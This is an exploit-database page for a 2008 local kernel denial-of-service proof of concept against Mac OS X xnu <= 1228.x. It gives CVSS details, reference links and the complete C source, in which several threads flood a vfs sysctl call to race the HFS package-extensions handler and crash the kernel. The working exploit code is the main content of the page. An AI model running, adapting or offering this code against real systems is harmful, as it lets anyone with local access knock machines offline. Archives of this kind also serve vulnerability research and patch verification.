Mac OS X xnu <=1228.x (vfssysctl) Local Kernel DoS PoC

2009.04.05
Credit: mu-b
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-362


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* xnu-vfssysctl-dos.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * Apple MACOS X xnu <= 1228.x local kernel DoS POC * by mu-b - Wed 19 Nov 2008 * * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <hfs/hfs_mount.h> #include <pthread.h> #include <string.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/sysctl.h> #include <unistd.h> void hammer (void *arg) { char buf[1024 * (255 + 1)]; int n, name[6]; memset (buf, 0, sizeof buf); while (1) { name[0] = CTL_VFS; name[1] = 17; name[2] = HFS_SET_PKG_EXTENSIONS; name[3] = (int) buf; name[4] = 1024; name[5] = (rand () % 254) + 1; n = sysctl (name, 6, NULL, NULL, NULL, 0); usleep(10); } } int main (int argc, char **argv) { int i, n, tid; printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); for (i = 0; i < 4; i++) { n = pthread_create (&tid, NULL, hammer, NULL); if (n < 0) { fprintf (stderr, "failed creating hammer thread\n"); return (EXIT_FAILURE); } } while (1) sleep (1); /* not reached! */ return (EXIT_SUCCESS); }

References:

http://www.securityfocus.com/bid/34202
http://www.milw0rm.com/exploits/8265
http://www.informationweek.com/news/hardware/mac/showArticle.jhtml?articleID=216401181
http://www.digit-labs.org/files/exploits/xnu-vfssysctl-dos.c


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top